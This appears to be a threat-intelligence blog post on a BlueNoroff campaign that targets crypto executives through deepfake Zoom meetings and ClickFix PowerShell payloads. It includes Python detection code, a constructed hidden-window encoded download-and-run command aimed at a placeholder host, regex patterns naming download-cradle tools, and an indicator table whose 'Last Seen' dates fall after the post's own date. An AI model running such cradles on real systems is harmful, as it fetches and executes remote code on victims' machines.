BlueNoroff Deepfake Zoom Attack: 100 Crypto Executives Compromised in 5 Minutes
2026-04-30 • Decryption Digest
https://www.decryptiondigest.com/blog/bluenoroff-deepfake-zoom-crypto-clickfix
BlueNoroff is using fake Zoom meetings, deepfake participant media, and ClickFix clipboard injection to target cryptocurrency and Web3 executives. The attack starts with Calendly-based social engineering and typo-squatted meeting domains, then tricks victims into running an obfuscated PowerShell payload that establishes C2 and persistence and carries out credential theft, Telegram session theft, screenshot capture, and UAC bypass. The campaign reportedly reuses stolen webcam footage and AI-generated media to make future lures more convincing, with more than 100 victim identities and over 950 media files recovered from attacker infrastructure. Confirmed targeting is heavily concentrated on crypto founders, executives, and financially adjacent leadership roles.
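Detecting the ClickFix stage described above from process-creation telemetry, as an added example that is not code from the page or from Decryption Digest: it assumes Sysmon-style fields (ParentImage, Image, CommandLine), uses constructed sample events, and the hidden-window and download-cradle regexes are heuristics of my own. The point is that a base64 -EncodedCommand wrapper defeats naive keyword matching unless the payload is decoded first.

```python
import base64
import re

def _enc(ps: str) -> str:
    """Build a -EncodedCommand value (UTF-16LE, base64) for the constructed sample."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()

# Constructed Sysmon-style process-creation events; none are taken from the page.
SAMPLE_EVENTS = [
    {   # benign: a user opens PowerShell from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
    {   # ClickFix-shaped: pasted into Win+R, hidden window, base64-wrapped download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -nop -enc "
        + _enc("iex (irm 'https://meeting-fix.example/check')"),
    },
    {   # benign: service-launched script, not an interactive shell
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\ops\backup.ps1",
    },
]

CRADLE = re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|mshta)\b", re.I)
HIDDEN = re.compile(r"-(w|win|windowstyle)\s+hidden|-nop\b|-ep\s+bypass", re.I)
ENC = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
def effective_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload so base64 wrapping cannot hide the cradle."""
    if not (m := ENC.search(cmdline)):
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return cmdline
    return cmdline + " " + decoded

def is_clickfix_like(event: dict) -> bool:
    """PowerShell spawned from the user's shell (Win+R lands under explorer.exe) with hiding flags AND a download cradle."""
    parent, image = event["ParentImage"].lower(), event["Image"].lower()
    if not parent.endswith("\\explorer.exe") or not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    cmd = effective_command(event["CommandLine"])
    return bool(HIDDEN.search(cmd)) and bool(CRADLE.search(cmd))

def triage(events) -> list:
    return [i for i, e in enumerate(events) if is_clickfix_like(e)]
```

Treat this as a triage heuristic, not a verdict: explorer.exe is also the parent of any command a user legitimately types into Run, so the cradle and hiding flags carry the signal, and the decoded command should be surfaced to the analyst alongside the raw one.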
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | check02id.com | 2026-04-16 | 2026-05-28 |
| IPv4 | 83.136.209.22 | 2026-04-16 | 2026-05-28 |
| IPv4 | 83.136.208.246 | 2026-04-16 | 2026-05-28 |
| IPv4 | 104.145.210.107 | 2026-04-16 | 2026-05-28 |
| DOMAIN | zoom.ue01web.us | 2026-04-30 | 2026-04-30 |
| HASH | 17158cd6490a2b3c672d087f3d69107… | 2026-04-27 | 2026-04-30 |
| HASH | db446f0e1d18b43805bfefe1af934ae… | 2026-04-27 | 2026-04-30 |
| HASH | dd1c72823f933952619cbb86aaeaea4… | 2026-04-27 | 2026-04-30 |
| DOMAIN | ms-live.com | 2026-04-27 | 2026-04-30 |
| DOMAIN | thriddata.com | 2026-04-27 | 2026-04-30 |
| DOMAIN | teams-live.org | 2026-04-27 | 2026-04-30 |
| DOMAIN | uu03webzoom.us | 2026-04-27 | 2026-04-30 |